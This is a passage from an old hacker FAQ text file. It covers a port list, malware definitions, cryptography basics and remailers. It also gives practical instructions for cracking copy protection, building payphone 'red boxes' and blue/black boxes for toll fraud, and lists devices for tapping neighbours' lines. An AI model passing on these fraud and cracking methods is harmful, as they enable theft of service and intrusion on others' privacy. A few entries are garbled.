|||
|
DEVICE2 2030/UDP
|
|||
|
BLACKBOARD 2032/TCP
|
|||
|
BLACKBOARD 2032/UDP
|
|||
|
GLOGGER 2033/TCP
|
|||
|
GLOGGER 2033/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2425)
|
|||
|
SCOREMGR 2034/TCP
|
|||
|
SCOREMGR 2034/UDP
|
|||
|
IMSLDOC 2035/TCP
|
|||
|
IMSLDOC 2035/UDP
|
|||
|
OBJECTMANAGER 2038/TCP
|
|||
|
OBJECTMANAGER 2038/UDP
|
|||
|
LAM 2040/TCP
|
|||
|
LAM 2040/UDP
|
|||
|
INTERBASE 2041/TCP
|
|||
|
INTERBASE 2041/UDP
|
|||
|
ISIS 2042/TCP
|
|||
|
ISIS 2042/UDP
|
|||
|
ISIS-BCAST 2043/TCP
|
|||
|
ISIS-BCAST 2043/UDP
|
|||
|
RIMSL 2044/TCP
|
|||
|
RIMSL 2044/UDP
|
|||
|
CDFUNC 2045/TCP
|
|||
|
CDFUNC 2045/UDP
|
|||
|
SDFUNC 2046/TCP
|
|||
|
SDFUNC 2046/UDP
|
|||
|
DLS 2047/TCP
|
|||
|
DLS 2047/UDP
|
|||
|
|
|||
|
#hack FAQ (70/2447)
|
|||
|
DLS-MONITOR 2048/TCP
|
|||
|
DLS-MONITOR 2048/UDP
|
|||
|
SHILP 2049/TCP
|
|||
|
SHILP 2049/UDP
|
|||
|
WWW-DEV 2784/TCP WORLD WIDE WEB - DEVELOPMENT
|
|||
|
WWW-DEV 2784/UDP WORLD WIDE WEB - DEVELOPMENT
|
|||
|
NSWS 3049/TCP
|
|||
|
NSWS 3049/DDDDP
|
|||
|
RFA 4672/TCP REMOTE FILE ACCESS SERVER
|
|||
|
RFA 4672/UDP REMOTE FILE ACCESS SERVER
|
|||
|
COMMPLEX-MAIN 5000/TCP
|
|||
|
COMMPLEX-MAIN 5000/UDP
|
|||
|
COMMPLEX-LINK 5001/TCP
|
|||
|
COMMPLEX-LINK 5001/UDP
|
|||
|
RFE 5002/TCP RADIO FREE ETHERNET
|
|||
|
RFE 5002/UDP RADIO FREE ETHERNET
|
|||
|
RMONITOR_SECURE 5145/TCP
|
|||
|
RMONITOR_SECURE 5145/UDP
|
|||
|
PADL2SIM 5236/TCP
|
|||
|
PADL2SIM 5236/UDP
|
|||
|
SUB-PROCESS 6111/TCP HP SOFTBENCH SUB-PROCESS CONTROL
|
|||
|
SUB-PROCESS 6111/UDP HP SOFTBENCH SUB-PROCESS CONTROL
|
|||
|
|
|||
|
#hack FAQ (70/2469)
|
|||
|
XDSXDM 6558/UDP
|
|||
|
XDSXDM 6558/TCP
|
|||
|
AFS3-FILESERVER 7000/TCP FILE SERVER ITSELF
|
|||
|
AFS3-FILESERVER 7000/UDP FILE SERVER ITSELF
|
|||
|
AFS3-CALLBACK 7001/TCP CALLBACKS TO CACHE MANAGERS
|
|||
|
AFS3-CALLBACK 7001/UDP CALLBACKS TO CACHE MANAGERS
|
|||
|
AFS3-PRSERVER 7002/TCP USERS & GROUPS DATABASE
|
|||
|
AFS3-PRSERVER 7002/UDP USERS & GROUPS DATABASE
|
|||
|
AFS3-VLSERVER 7003/TCP VOLUME LOCATION DATABASE
|
|||
|
AFS3-VLSERVER 7003/UDP VOLUME LOCATION DATABASE
|
|||
|
AFS3-KASERVER 7004/TCP AFS/KERBEROS AUTHENTICATION SERVICE
|
|||
|
AFS3-KASERVER 7004/UDP AFS/KERBEROS AUTHENTICATION SERVICE
|
|||
|
AFS3-VOLSER 7005/TCP VOLUME MANAGMENT SERVER
|
|||
|
AFS3-VOLSER 7005/UDP VOLUME MANAGMENT SERVER
|
|||
|
AFS3-ERRORS 7006/TCP ERROR INTERPRETATION SERVICE
|
|||
|
AFS3-ERRORS 7006/UDP ERROR INTERPRETATION SERVICE
|
|||
|
AFS3-BOS 7007/TCP BASIC OVERSEER PROCESS
|
|||
|
AFS3-BOS 7007/UDP BASIC OVERSEER PROCESS
|
|||
|
AFS3-UPDATE 7008/TCP SERVER-TO-SERVER UPDATER
|
|||
|
AFS3-UPDATE 7008/UDP SERVER-TO-SERVER UPDATER
|
|||
|
AFS3-RMTSYS 7009/TCP REMOTE CACHE MANAGER SERVICE
|
|||
|
AFS3-RMTSYS 7009/UDP REMOTE CACHE MANAGER SERVICE
|
|||
|
|
|||
|
#hack FAQ (70/2491)
|
|||
|
MAN 9535/TCP
|
|||
|
MAN 9535/UDP
|
|||
|
ISODE-DUA 17007/TCP
|
|||
|
ISODE-DUA 17007/UDP
|
|||
|
|
|||
|
|
|||
|
23. WHAT IS A TROJAN/WORM/VIRUS/LOGIC BOMB?
|
|||
|
|
|||
|
THIS FAQ ANSWER IS EXCERPTED FROM: COMPUTER SECURITY BASICS
|
|||
|
BY DEBORAH RUSSELL
|
|||
|
AND G.T. GENGEMI SR.
|
|||
|
|
|||
|
TROJAN: AN INDEPENDENT PROGRAM THAT APPEARS TO PERFORM A USEFUL
|
|||
|
FUNCTION BUT THAT HIDES ANOTHER UNAUTHORIZED PROGRAM
|
|||
|
INSIDE IT. WHEN AN AUTHORIZED USER PERFORMS THE APPARENT
|
|||
|
FUNCTION, THE TROJAN HORSE PERFORMS THE UNAUTHORIZED
|
|||
|
FUNCTION AS WELL (OFTEN USURPING THE PRIVILEGES OF THE
|
|||
|
USER).
|
|||
|
|
|||
|
VIRUS: A CODE FRAGMENT (NOT AN INDEPENDENT PROGRAM) THAT
|
|||
|
REPRODUCES BY ATTACHING TO ANOTHER PROGRAM. IT MAY DAMAGE
|
|||
|
DATA DIRECTLY, OR IT MAY DEGRADE SYSTEM PERFORMANCE BY
|
|||
|
|
|||
|
#hack FAQ (70/2513)
|
|||
|
TAKING OVER SYSTEM RESOURCES WHICH ARE THEN NOT AVAILABLE
|
|||
|
TO AUTHORIZED USERS.
|
|||
|
|
|||
|
WORM: AN INDEPENDENT PROGRAM THAT REPRODUCES BY COPYING ITSELF
|
|||
|
FROM ONE SYSTEM TO ANOTHER, USUALLY OVER A NETWORK. LIKE
|
|||
|
A VIRUS, A WORM MAY DAMAGE DATA DIRECTLY, OR IT MAY
|
|||
|
DEGRADE SYSTEM PERFORMANCE BY TYING UP SYSTEM RESOURCES AND
|
|||
|
EVEN SHUTTING DOWN A NETWORK.
|
|||
|
|
|||
|
LOGIC BOMB: A METHOD FOR RELEASING A SYSTEM ATTACK OF SOME KIND. IT
|
|||
|
IS TRIGGERED WHEN A PARTICULAR CONDITION (E.G., A CERTAIN
|
|||
|
DATE OR SYSTEM OPERATION) OCCURS.
|
|||
|
|
|||
|
|
|||
|
24. HOW CAN I PROTECT MYSELF FROM VIRII AND SUCH?
|
|||
|
|
|||
|
ALWAYS WRITE PROTECT YOUR FLOPPY DISKS WHEN YOU ARE NOT PURPOSEFULLY
|
|||
|
WRITING TO THEM.
|
|||
|
|
|||
|
USE ATTRIB TO MAKE ALL OF YOUR EXE AND COM FILES READ ONLY. THIS WILL
|
|||
|
PROTECT YOU FROM MANY POORLY WRITTEN VIRUSES.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (70/2535)
|
|||
|
SCAN ANY SOFTWARE THAT YOU RECEIVE WITH A RECENT COPY OF A GOOD VIRUS
|
|||
|
SCANNER. THE BEST VIRUS SCANNER CURRENTLY AVAILABLE FOR DOS IS F-PROT
|
|||
|
BY FRIDRIK SKULASON. THE CURRENT VERSION IS FP-212C. IT IS BEST TO
|
|||
|
USE MORE THAN ONE VIRUS SCANNER. THAT WILL DECREASE YOUR CHANCES OF
|
|||
|
MISSING A VIRUS.
|
|||
|
|
|||
|
BACKUP REGULARLY, AND KEEP SEVERAL GENERATIONS OF BACKUPS ON HAND.
|
|||
|
IF YOU ALWAYS BACKUP OVER YOUR LAST BACKUP, YOU MAY FIND YOURSELF WITH
|
|||
|
AN INFECTED BACKUP TAPE.
|
|||
|
|
|||
|
|
|||
|
25. WHAT IS CRYPTOXXXXXXX?
|
|||
|
|
|||
|
THIS FAQ ANSWER IS EXCERPTED FROM: COMPUTER SECURITY BASICS
|
|||
|
BY DEBORAH RUSSELL
|
|||
|
AND G.T. GENGEMI SR.
|
|||
|
|
|||
|
A MESSAGE IS CALLED EITHER PLAINTEXT OR CLEARTEXT. THE PROCESS OF
|
|||
|
DISGUISING A MESSAGE IN SUCH A WAY AS TO HIDE ITS SUBSTANCE IS CALLED
|
|||
|
ENCRYPTION. AN ENCRYPTED MESSAGE IS CALLED CIPHERTEXT. THE PROCESS
|
|||
|
OF TURNING CIPHERTEXT BACK INTO PLAINTEXT IS CALLED DECRYPTION.
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (70/2557)
|
|||
|
THE ART AND SCIENCE OF KEEPING MESSAGES SECURE IS CALLED CRYPTOGRAPHY,
|
|||
|
AND IT IS PRACTICED BY CRYPTOGRAPHERS. CRYPTANALYSTS ARE
|
|||
|
PRACTITIONERS OF CRYPTANALYSIS, THE ART AND SCIENCE OF BREAKING
|
|||
|
CIPHERTEXT, I.E. SEEING THROUGH THE DISGUISE. THE BRANCH OF
|
|||
|
MATHEMATICS EMBODYING BOTH CRYPTOGRAPHY AND CRYPTANALYSIS IS CALLED
|
|||
|
CRYPTOLOGY, AND IT'S PRACTITIONERS ARE CALLED CRYPTOLOGISTS.
|
|||
|
|
|||
|
|
|||
|
26. WHAT IS PGP?
|
|||
|
|
|||
|
THIS FAQ ANSWER IS EXCERPTED FROM: PGP(TM) USER'S GUIDE
|
|||
|
VOLUME I: ESSENTIAL TOPICS
|
|||
|
BY PHILIP ZIMMERMANN
|
|||
|
|
|||
|
PGP(TM) USES PUBLIC-KEY ENCRYPTION TO PROTECT E-MAIL AND DATA FILES.
|
|||
|
COMMUNICATE SECURELY WITH PEOPLE YOU'VE NEVER MET, WITH NO SECURE
|
|||
|
CHANNELS NEEDED FOR PRIOR EXCHANGE OF KEYS. PGP IS WELL FEATURED AND
|
|||
|
FAST, WITH SOPHISTICATED KEY MANAGEMENT, DIGITAL SIGNATURES, DATA
|
|||
|
COMPRESSION, AND GOOD ERGONOMIC DESIGN.
|
|||
|
|
|||
|
PRETTY GOOD(TM) PRIVACY (PGP), FROM PHIL'S PRETTY GOOD SOFTWARE, IS A
|
|||
|
HIGH SECURITY CRYPTOGRAPHIC SOFTWARE APPLICATION FOR MS-DOS, UNIX,
|
|||
|
|
|||
|
#hack FAQ (70/2579)
|
|||
|
VAX/VMS, AND OTHER COMPUTERS. PGP ALLOWS PEOPLE TO EXCHANGE FILES OR
|
|||
|
MESSAGES WITH PRIVACY, AUTHENTICATION, AND CONVENIENCE. PRIVACY MEANS
|
|||
|
THAT ONLY THOSE INTENDED TO RECEIVE A MESSAGE CAN READ IT.
|
|||
|
AUTHENTICATION MEANS THAT MESSAGES THAT APPEAR TO BE FROM A PARTICULAR
|
|||
|
PERSON CAN ONLY HAVE ORIGINATED FROM THAT PERSON. CONVENIENCE MEANS
|
|||
|
THAT PRIVACY AND AUTHENTICATION ARE PROVIDED WITHOUT THE HASSLES OF
|
|||
|
MANAGING KEYS ASSOCIATED WITH CONVENTIONAL CRYPTOGRAPHIC SOFTWARE. NO
|
|||
|
SECURE CHANNELS ARE NEEDED TO EXCHANGE KEYS BETWEEN USERS, WHICH MAKES
|
|||
|
PGP MUCH EASIER TO USE. THIS IS BECAUSE PGP IS BASED ON A POWERFUL
|
|||
|
NEW TECHNOLOGY CALLED "PUBLIC KEY" CRYPTOGRAPHY.
|
|||
|
|
|||
|
PGP COMBINES THE CONVENIENCE OF THE RIVEST-SHAMIR-ADLEMAN (RSA)
|
|||
|
PUBLIC KEY CRYPTOSYSTEM WITH THE SPEED OF CONVENTIONAL CRYPTOGRAPHY,
|
|||
|
MESSAGE DIGESTS FOR DIGITAL SIGNATURES, DATA COMPRESSION BEFORE
|
|||
|
ENCRYPTION, GOOD ERGONOMIC DESIGN, AND SOPHISTICATED KEY MANAGEMENT.
|
|||
|
AND PGP PERFORMS THE PUBLIC-KEY FUNCTIONS FASTER THAN MOST OTHER
|
|||
|
SOFTWARE IMPLEMENTATIONS. PGP IS PUBLIC KEY CRYPTOGRAPHY FOR THE
|
|||
|
MASSES.
|
|||
|
|
|||
|
|
|||
|
27. WHAT IS TEMPEST?
|
|||
|
|
|||
|
|
|||
|
#hack FAQ (70/2601)
|
|||
|
COMPUTERS AND OTHER ELECTRONIC EQUIPMENT RELEASE INTERFERENCE TO THEIR
|
|||
|
SURROUNDING ENVIRONMENT. YOU MAY OBSERVE THIS BY PLACING TWO VIDEO
|
|||
|
MONITORS CLOSE TOGETHER. THE PICTURES WILL BEHAVE ERRATICALLY UNTIL
|
|||
|
YOU SPACE THEM APART.
|
|||
|
|
|||
|
ALTHOUGH MOST OF THE TIME THESE EMISSIONS ARE SIMPLY ANNOYANCES, THEY
|
|||
|
CAN SOMETIMES BE VERY HELPFUL. SUPPOSE WE WANTED TO SEE WHAT PROJECT
|
|||
|
A TARGET WAS WORKING ON. WE COULD SIT IN A VAN OUTSIDE HER OFFICE AND
|
|||
|
USE SENSITIVE ELECTRONIC EQUIPMENT TO ATTEMPT TO PICK UP AND DECIPHER
|
|||
|
THE EMANATIONS FROM HER VIDEO MONITOR.
|
|||
|
|
|||
|
OUR COMPETITOR, HOWEVER, COULD SHIELD THE EMANATIONS FROM HER
|
|||
|
EQUIPMENT OR USE EQUIPMENT WITHOUT STRONG EMANATIONS.
|
|||
|
|
|||
|
TEMPEST IS THE US GOVERNMENT PROGRAM FOR EVALUATION AND ENDORSEMENT
|
|||
|
OF ELECTRONIC EQUIPMENT THAT IS SAFE FROM EAVESDROPPING.
|
|||
|
|
|||
|
|
|||
|
28. WHAT IS AN ANONYMOUS REMAILER?
|
|||
|
|
|||
|
AN ANONYMOUS REMAILER IS A SYSTEM ON THE INTERNET THAT ALLOWS YOU TO
|
|||
|
SEND E-MAIL ANONYMOUSLY OR POST MESSAGES TO USENET ANONYMOUSLY.
|
|||
|
|
|||
|
#hack FAQ (71/2624)
|
|||
|
YOU APPLY FOR AN ANONYMOUS ID AT THE REMAILER SITE. THEN, WHEN YOU
|
|||
|
SEND A MESSAGE TO THE REMAILER, IT SENDS IT OUT FROM YOUR ANONYMOUS ID
|
|||
|
AT THE REMAILER. NO ONE READING THE POST WILL KNOW YOUR REAL ACCOUNT
|
|||
|
NAME OR HOST NAME. IF SOMEONE SENDS A MESSAGE TO YOUR ANONYMOUS ID,
|
|||
|
IT WILL BE FORWARDED TO YOUR REAL ACCOUNT BY THE REMAILER.
|
|||
|
|
|||
|
|
|||
|
29. WHAT ARE THE ADDRESSES OF SOME ANONYMOUS REMAILERS?
|
|||
|
|
|||
|
THE MOST POPULAR AND STABLE ANONYMOUS REMAILER IS ANON.PENET.FI,
|
|||
|
OPERATED BY JOHAN HELSINGUS. TO OBTAIN AN ANONYMOUS ID, MAIL
|
|||
|
PING@ANON.PENET.FI. FOR ASSISTANCE IS OBTAINING AN ANONYMOUS ACCOUNT
|
|||
|
AT PENET, MAIL HELP@ANON.PENET.FI.
|
|||
|
|
|||
|
|
|||
|
30. HOW DO I DEFEAT COPY PROTECTION?
|
|||
|
|
|||
|
THERE ARE TWO COMMON METHODS OF DEFEATING COPY PROTECTION. THE FIRST
|
|||
|
IS TO USE A PROGRAM THAT REMOVES COPY PROTECTION. POPULAR PROGRAMS
|
|||
|
THAT DO THIS ARE COPYIIPC FROM CENTRAL POINT SOFTWARE AND COPYWRITE
|
|||
|
FROM QUAID SOFTWARE. THE SECOND METHOD INVOLVES PATCHING THE COPY
|
|||
|
PROTECTED PROGRAM. FOR POPULAR SOFTWARE, YOU MAY BE ABLE TO LOCATE A
|
|||
|
|
|||
|
#hack FAQ (71/2646)
|
|||
|
READY MADE PATCH. YOU CAN THEM APPLY THE PATCH USING ANY HEX EDITOR,
|
|||
|
SUCH AS DEBUG OR THE PETER NORTON'S DISKEDIT. IF YOU CANNOT, YOU MUST
|
|||
|
PATCH THE SOFTWARE YOURSELF.
|
|||
|
|
|||
|
WRITING A PATCH REQUIRES A DEBUGGER, SUCH AS SOFT-ICE OR SOURCER. IT
|
|||
|
ALSO REQUIRES SOME KNOWLEDGE OF ASSEMBLY LANGUAGE. LOAD THE PROTECTED
|
|||
|
PROGRAM UNDER THE DEBUGGER AND WATCH FOR IT TO CHECK THE PROTECTION
|
|||
|
MECHANISM. WHEN IT DOES, CHANGE THAT PORTION OF THE CODE. THE CODE
|
|||
|
CAN BE CHANGED FROM JE (JUMP ON EQUAL) OR JNE (JUMP ON NOT EQUAL) TO
|
|||
|
JMP (JUMP UNCONDITIONALLY). OR THE CODE MAY SIMPLY BE REPLACED WITH
|
|||
|
NOP (NO OPERATION) INSTRUCTIONS.
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
SECTION B: TELEPHONY
|
|||
|
~~~~~~~~~~~~~~~~~~~~
|
|||
|
|
|||
|
01. WHAT IS A RED BOX?
|
|||
|
|
|||
|
WHEN A COIN IS INSERTED INTO A PAYPHONE, THE PHONE EMITS A SET OF
|
|||
|
TONES. A RED BOX IS A DEVICE THAT SIMULATES THOSE TONES, WITH THE
|
|||
|
|
|||
|
#hack FAQ (71/2668)
|
|||
|
PURPOSE OF FOOLING THE PAYPHONE INTO BELIEVING YOU HAVE INSERTED AN
|
|||
|
ACTUAL COIN. THE ACTUAL TONES ARE:
|
|||
|
|
|||
|
NICKEL SIGNAL 1700+2200 0.060S ON
|
|||
|
DIME SIGNAL 1700+2200 0.060S ON, 0.060S OFF, TWICE REPEATING
|
|||
|
QUARTER SIGNAL 1700+2200 33MS ON, 33MS OFF, 5 TIMES REPEATING
|
|||
|
|
|||
|
|
|||
|
02. HOW DO I BUILD A RED BOX?
|
|||
|
|
|||
|
RED BOXES ARE COMMONLY MANUFACTURED FROM MODIFIED RADIO SHACK TONE
|
|||
|
DIALERS, HALLMARK GREETING CARDS, OR MADE FROM SCRATCH FROM READILY
|
|||
|
AVAILABLE ELECTRONIC COMPONENTS.
|
|||
|
|
|||
|
TO MAKE A RED BOX FROM A RADIO SHACK 43-141 OR 43-146 TONE DIALER,
|
|||
|
OPEN THE DIALER AND REPLACE THE CRYSTAL (THE LARGEST SHINY METAL
|
|||
|
COMPONENT). THE EXACT VALUE NEEDED IS 6.502457409MHZ. UNFORTUNATELY,
|
|||
|
THAT CRYSTAL IS NOT COMMONLY MANUFACTURED. A CRYSTAL CLOSE TO THAT
|
|||
|
VALUE WILL CREATE A TONE THAT FALLS WITHIN TOLERANCES. THE MOST
|
|||
|
POPULAR CHOICE IS THE 6.5536MHZ CRYSTAL. WHEN YOU ARE FINISHED
|
|||
|
REPLACING THE CRYSTAL, PROGRAM THE P1 BUTTON WITH FIVE *'S. THAT WILL
|
|||
|
SIMULATE A QUARTER TONE EACH TIME YOU PRESS P1.
|
|||
|
|
|||
|
#hack FAQ (73/2692)
|
|||
|
03. WHERE CAN I GET A 6.5536MHZ CRYSTAL?
|
|||
|
|
|||
|
YOUR BEST BET IS A LOCAL ELECTRONICS STORE. RADIO SHACK SELLS THEM,
|
|||
|
BUT THEY ARE OVERPRICED AND THE STORE MUST ORDER THEM IN. THIS TAKES
|
|||
|
APPROXIMATELY TWO WEEKS. IN ADDITION, MANY RADIO SHACK EMPLOYEES DO
|
|||
|
NOT KNOW THAT THIS CAN BE DONE.
|
|||
|
|
|||
|
OR, YOU COULD ORDER THE CRYSTAL MAIL ORDER. THIS INTRODUCES SHIPPING
|
|||
|
AND HANDLING CHARGES, WHICH ARE USUALLY MUCH GREATER THAN THE PRICE OF
|
|||
|
THE CRYSTAL. IT'S BEST TO GET SEVERAL PEOPLE TOGETHER TO SHARE THE
|
|||
|
S&H COST. OR, BUY FIVE OR SIX YOURSELF AND SELL THEM LATER. SOME OF
|
|||
|
THE PLACES YOU CAN ORDER CRYSTALS ARE:
|
|||
|
|
|||
|
DIGI-KEY
|
|||
|
701 BROOKS AVENUE SOUTH
|
|||
|
P.O. BOX 677
|
|||
|
THIEF RIVER FALLS, MN 56701-0677
|
|||
|
(80)344-4539
|
|||
|
PART NUMBER:X415-ND /* NOTE: 6.500MHZ AND ONLY .197 X .433 X .149! */
|
|||
|
PART NUMBER:X018-ND
|
|||
|
|
|||
|
JDR MICRODEVICES:
|
|||
|
|
|||
|
#hack FAQ (73/2714)
|
|||
|
2233 BRANHAM LANE
|
|||
|
SAN JOSE, CA 95124
|
|||
|
(800)538-5000
|
|||
|
PART NUMBER: 6.5536MHZ
|
|||
|
|
|||
|
TANDY EXPRESS ORDER MARKETING
|
|||
|
401 NE 38TH STREET
|
|||
|
FORT WORTH, TX 76106
|
|||
|
(800)241-8742
|
|||
|
PART NUMBER: 10068625
|
|||
|
|
|||
|
|
|||
|
04. WHICH PAYPHONES WILL A RED BOX WORK ON?
|
|||
|
|
|||
|
RED BOXES WILL WORK ON TELCO OWNED PAYPHONES, BUT NOT ON COCOT'S
|
|||
|
(CUSTOMER OWNED COIN OPERATED TELEPHONES).
|
|||
|
|
|||
|
|
|||
|
05. WHAT IS A BLUE BOX?
|
|||
|
|
|||
|
BLUE BOXES USE A 2600HZ TONE TO CONVINCE TELEPHONE SWITCHES THAT USE
|
|||
|
IN-BAND SIGNALLING THAT THE CALLER IS ACTUALLY A TELEPHONE OPERATOR.
|
|||
|
|
|||
|
#hack FAQ (73/2736)
|
|||
|
THE CALLER MAY THEN ACCESS SPECIAL SWITCH FUNCTIONS, WITH THE USUAL
|
|||
|
PURPOSE OF MAKING FREE LONG DISTANCE PHONE CALLS, USING THE
|
|||
|
MULTI-FREQUENCY TONES PROVIDED BY THE BLUE BOX.
|
|||
|
|
|||
|
|
|||
|
06. DO BLUE BOXES STILL WORK?
|
|||
|
|
|||
|
BLUE BOXES STILL WORK IN AREAS USING IN-BAND SIGNALLING. MODERN PHONE
|
|||
|
SIGNALLING SWITCHES USING ESS (ELECTRONIC SIGNALLING SYSTEMS) USE
|
|||
|
OUT-OF-BAND-SIGNALLING. NOTHING YOU SEND OVER THE VOICE PORTION OF
|
|||
|
BANDWIDTH CAN CONTROL THE SWITCH.
|
|||
|
|
|||
|
|
|||
|
07. WHAT IS A BLACK BOX?
|
|||
|
|
|||
|
A BLACK BOX IS A 1.8K OHM RESISTOR PLACED ACROSS YOUR PHONE LINE TO
|
|||
|
CAUSE THE PHONE COMPANY EQUIPMENT TO BE UNABLE TO DETECT THAT YOU HAVE
|
|||
|
ANSWERED YOUR TELEPHONE. PEOPLE WHO CALL YOU WILL THEN NOT BE BILLED
|
|||
|
FOR THE TELEPHONE CALL. BLACK BOXES DO NOT WORK UNDER ESS.
|
|||
|
|
|||
|
|
|||
|
08. WHAT DO ALL THE COLORED BOXES DO?
|
|||
|
|
|||
|
#hack FAQ (74/2759)
|
|||
|
ACRYLIC STEAL THREE-WAY-CALLING, CALL WAITING AND PROGRAMMABLE
|
|||
|
|
|||
|
CALL FORWARDING ON OLD 4-WIRE PHONE SYSTEMS
|
|||
|
AQUA DRAIN THE VOLTAGE OF THE FBI LOCK-IN-TRACE/TRAP-TRACE
|
|||
|
BEIGE LINEMAN'S HAND SET
|
|||
|
BLACK ALLOWS THE CALLING PARTY TO NOT BE BILLED FOR THE CALL
|
|||
|
|
|||
|
PLACED
|
|||
|
BLAST PHONE MICROPHONE AMPLIFIER
|
|||
|
BLOTTO SUPPOSEDLY SHORTS EVERY FONE OUT IN THE IMMEDIATE AREA
|
|||
|
BLUE EMULATE A TRUE OPERATOR BY SEIZING A TRUNK WITH A 2600HZ
|
|||
|
|
|||
|
TONE
|
|||
|
BROWN CREATE A PARTY LINE FROM 2 PHONE LINES
|
|||
|
BUD TAP INTO YOUR NEIGHBORS PHONE LINE
|
|||
|
CHARTREUSE USE THE ELECTRICITY FROM YOUR PHONE LINE
|
|||
|
CHEESE CONNECT TWO PHONES TO CREATE A DIVERTER
|
|||
|
CHROME MANIPULATE TRAFFIC SIGNALS BY REMOTE CONTROL
|
|||
|
CLEAR A TELEPHONE PICKUP COIL AND A SMALL AMP USE TO MAKE FREE
|
|||
|
|
|||
|
CALLS ON FORTRESS PHONES
|
|||
|
COLOR LINE ACTIVATED TELEPHONE RECORDER
|
|||
|
|
|||
|
#hack FAQ (74/2781)
|
|||
|
COPPER CAUSE CROSSTALK INTERFERENCE ON AN EXTENDER
|
|||
|
CRIMSON HOLD BUTTON
|
|||
|
DARK RE-ROUTE OUTGOING OR INCOMING CALLS TO ANOTHER PHONE
|
|||
|
DAYGLO CONNECT TO YOUR NEIGHBORS PHONE LINE
|
|||
|
DIVERTOR RE-ROUTE OUTGOING OR INCOMING CALLS TO ANOTHER PHONE
|
|||
|
DLOC CREATE A PARTY LINE FROM 2 PHONE LINES
|
|||
|
GOLD TRACE CALLS, TELL IF THE CALL IS BEING TRACED, AND CAN
|
|||
|
|
|||
|
CHANGE A TRACE
|
|||
|
GREEN EMULATE THE COIN COLLECT, COIN RETURN, AND RINGBACK TONES
|
|||
|
INFINITY REMOTELY ACTIVATED PHONE TAP
|
|||
|
JACK TOUCH-TONE KEY PAD
|
|||
|
LIGHT IN-USE LIGHT
|
|||
|
LUNCH AM TRANSMITTER
|
|||
|
MAGENTA CONNECT A REMOTE PHONE LINE TO ANOTHER REMOTE PHONE LINE
|
|||
|
MAUVE PHONE TAP WITHOUT CUTTING INTO A LINE
|
|||
|
NEON EXTERNAL MICROPHONE
|
|||
|
NOISE CREATE LINE NOISE
|
|||
|
OLIVE EXTERNAL RINGER
|
|||
|
PARTY CREATE A PARTY LINE FROM 2 PHONE LINES
|
|||
|
PEARL TONE GENERATOR
|
|||
|
PINK CREATE A PARTY LINE FROM 2 PHONE LINES
|
|||
|
|
|||
|
#hack FAQ (74/2803)
|
|||
|
PURPLE TELEPHONE HOLD BUTTON
|
|||
|
RAINBOW KILL A TRACE BY PUTTING 120V INTO THE PHONE LINE (JOKE)
|
|||
|
RAZZ TAP INTO YOUR NEIGHBORS PHONE
|
|||
|
RED MAKE FREE PHONE CALLS FROM PAY PHONES BY GENERATING
|
|||
|
|
|||
|
QUARTER TONES
|
|||
|
ROCK ADD MUSIC TO YOUR PHONE LINE
|
|||
|
SCARLET CAUSE A NEIGHBORS PHONE LINE TO HAVE POOR RECEPTION
|
|||
|
SILVER CREATE THE DTMF TONES FOR A, B, C AND D
|
|||
|
STATIC KEEP THE VOLTAGE ON A PHONE LINE HIGH
|
|||
|
SWITCH ADD HOLD, INDICATOR LIGHTS, CONFERENCING, ETC..
|
|||
|
TAN LINE ACTIVATED TELEPHONE RECORDER
|
|||
|
TRON REVERSE THE PHASE OF POWER TO YOUR HOUSE, CAUSING YOUR
|
|||
|
|
|||
|
ELECTRIC METER TO RUN SLOWER
|
|||
|
TV CABLE "SEE" SOUND WAVES ON YOUR TV
|
|||
|
URINE CREATE A CAPACITATIVE DISTURBANCE BETWEEN THE RING AND
|
|||
|
|
|||
|
TIP WIRES IN ANOTHER'S TELEPHONE HEADSET
|
|||
|
VIOLET KEEP A PAYPHONE FROM HANGING UP
|
|||
|
WHITE PORTABLE DTMF KEYPAD
|
|||
|
YELLOW ADD AN EXTENSION PHONE
|
|||
|
|
|||
|
#hack FAQ (76/2827)
|
|||
|
09. WHAT IS AN ANAC NUMBER?
|
|||
|
|
|||
|
AN ANAC (AUTOMATIC NUMBER ANNOUNCEMENT CIRCUIT) NUMBER IS A TELEPHONE
|
|||
|
NUMBER THAT PLAYS BACK THE NUMBER OF THE TELEPHONE THAT CALLED IT.
|
|||
|
ANAC NUMBERS ARE CONVENIENT IF YOU WANT TO KNOW THE TELEPHONE NUMBER
|
|||
|
OF A PAIR OF WIRES.
|
|||
|
|
|||
|
|
|||
|
10. WHAT IS THE ANAC NUMBER FOR MY AREA?
|
|||
|
|
|||
|
HOW TO FIND YOUR ANAC NUMBER:
|
|||
|
|
|||
|
LOOK UP YOUR NPA (AREA CODE) AND TRY THE NUMBER LISTED FOR IT. IF THAT
|
|||
|
FAILS, TRY 1 PLUS THE NUMBER LISTED FOR IT. IF THAT FAILS, TRY THE
|
|||
|
COMMON NUMBERS LIKE 311, 958 AND 200-222-2222. IF YOU FIND THE ANAC
|
|||
|
NUMBER FOR YOUR AREA, PLEASE LET US KNOW.
|
|||
|
|
|||
|
NOTE THAT MANY TIMES THE ANAC NUMBER WILL VARY FOR DIFFERENT
|
|||
|
SWITCHES IN THE SAME CITY.
|
|||
|
|
|||
|
MANY COMPANIES OPERATE 800 NUMBER SERVICES WHICH WILL READ BACK TO YOU
|
|||
|
THE NUMBER FROM WHICH YOU ARE CALLING. MANY OF THESE REQUIRE
|
|||
|
|
|||
|
#hack FAQ (76/2849)
|
|||
|
NAVIGATING A SERIES OF MENUS TO GET THE PHONE NUMBER YOU ARE LOOKING
|
|||
|
FOR.
|
|||
|
|
|||
|
(800)238-4959 A VOICE MAIL SYSTEM
|
|||
|
(800)328-2630 A PHONE SEX LINE
|
|||
|
(800)568-3197 INFO ACCESS TELEPHONE COMPANY'S AUTOMATED BLOCKING LINE
|
|||
|
(800)571-8859 A PHONE SEX LINE
|
|||
|
(800)692-6447 (800)MY-ANI-IS
|
|||
|
(800)769-3766 DUKE POWER COMPANY AUTOMATED OUTAGE SYSTEM
|
|||
|
|
|||
|
AN NON-800 ANAC THAT WORKS NATIONWIDE IS 404-988-9664. THE ONE CATCH
|
|||
|
WITH THIS NUMBER IS THAT IT MUST BE DIALED WITH THE AT&T CARRIER
|
|||
|
ACCESS CODE 10732.
|
|||
|
|
|||
|
PLEASE USE LOCAL ANAC NUMBERS IF YOU CAN, AS ABUSE OR OVERUSE KILLS
|
|||
|
800 ANAC NUMBERS.
|
|||
|
|
|||
|
NPA ANAC NUMBER COMMENTS
|
|||
|
--- --------------- ---------------------------------------------
|
|||
|
